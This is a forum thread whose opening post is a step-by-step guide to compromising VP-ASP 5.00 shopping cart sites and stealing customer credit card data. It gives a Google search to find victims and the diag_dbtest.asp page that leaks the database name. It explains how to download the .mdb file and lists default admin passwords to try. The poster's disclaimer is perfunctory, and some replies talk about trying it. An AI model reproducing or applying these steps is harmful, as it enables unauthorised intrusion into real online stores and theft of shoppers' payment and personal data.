How to hack ASP Shopadmins within minutes

[tarch]

This guide should be used purely for knowlage, and not used for exploiting or hacking in any shape or form


SHOPADMINS ARE OF DIFFERENT COMPANIES LIKE : VP-ASP , X CART .. ETC ETC. I'M POSTING THIS TUTORIAL ON HACKING VP-ASP SHOPADMINS.

Have you ever went to purchase something on the internet and you needed to enter your credit card information? I'm sure you have. Whether it had been porn, an Ipod, a laptop or anything. Below I'm posting how to hack into the database that holds this information from past customers. If the version of ASP shopadmin is correct, you can eaisly hack into it and steal credit card information, secret company/client information. Please note that huge shops like Amazon, etc use different software and aren't stupid enough to have their shopadmins exploited so easily.

---------------------

The type of shopadmin you will be looking for is VP-ASP Shopping Cart Version 5.00

Now, how do you find these? Well, I'm sure you've been told Google is your friend plenty of times, and it's extremely useful in this scenario.

Go to Google.com and type this;
intitle: VP-ASP Shopping Cart 5.00
You will find many websites with VP-ASP 5.00 cart software installed. Just pick a random one, on a random page. Remember that alot of these would of already been exploited, so try one on like page 1000 . Now you need to exploit it!

The page will look like this...> ****://***.victim.com/shop/shopdisplaycategories.asp
The exploit is : diag_dbtest.asp
So do this>
****://***.victim.com/shop/diag_dbtest.asp

A page will come up that shows:


atabase
shopping140 (140 being the number of products in the shop which is helpful to know if you're hacking a big website)

blocation
resx

xdatabasetypexEmailxEmailNamexEmailSubjectxEmailSy stemxEmailTypexOrdernumber (Example)
The most important thing here is atabase

atabase: shopping140

Ok now the URL will be like this:

****://***.victim.com/shop/shopping140.mdb
continue 04/02/2007 22:53
If you didn't /can't download the database, try this while there is dblocation.

blocation
resx

Now the URL will be this...

****://***.victim.com/shop/resx/shopping140.mdb

If you see an error message, try this.

****://***.victim.com/shop/shopping500.mdb

Download the mdb file and you should be able to open it with any mdb file viewer. Find one at download.com or use MS Office or whatever.

Now you are inside the shop, look for credit card information and usually the shopadmin username and password.

The admin login page is usually located here..

****://***.victim.com/shop/shopadmin.asp

If you can't find the MDB or the shopadmin login, try all the default passwords, seriously, some people ARE this stupid.

Username: admin
password: admin
OR
Username: vpasp
password: vpasp

---------------------

I hope you enjoyed the guide.

[Pepsi]

really interesting have you tried it? How do you know this works?

[Jon.]

I dunno if I really want to try this :P I dun wanna get like, arrested
But it seems nice. ^_^ I shall try it at my mom's house.
I googled the first part of it, and seems easy enough to follow.

[Kelsey]

It's kinda confusing. =/
I dunno. Sounds cool until ur the one who gets hacked. O.o

[tarch]

Well yeah of course it works, and I wouldn't know unless I tried it. I have a few programs that do this automatically for you, but they're not free nor for sale .

[AliaSky]

Well, I will be using this to learn which shops to NOT shop from. I can tell you that.

If nothing else, thank you for pointing out this little fail in the system.

[Razzgirl]

That's what I'm thinking Aliasky. I won't be putting my cc info into any shops that use that

[tarch]

Then don't use any site except Amazon :P

[Powerof_one]

Yes this works due to people not bein dilligent in their use of bot exclusion files. lazy sods
So google index's the pages it also works for other things :P

[starly]

lol, this exploit is so easy to patch. every site that is open to exploit this has to be really bullshit :D

and bot exclusion doesn't make a difference, lmao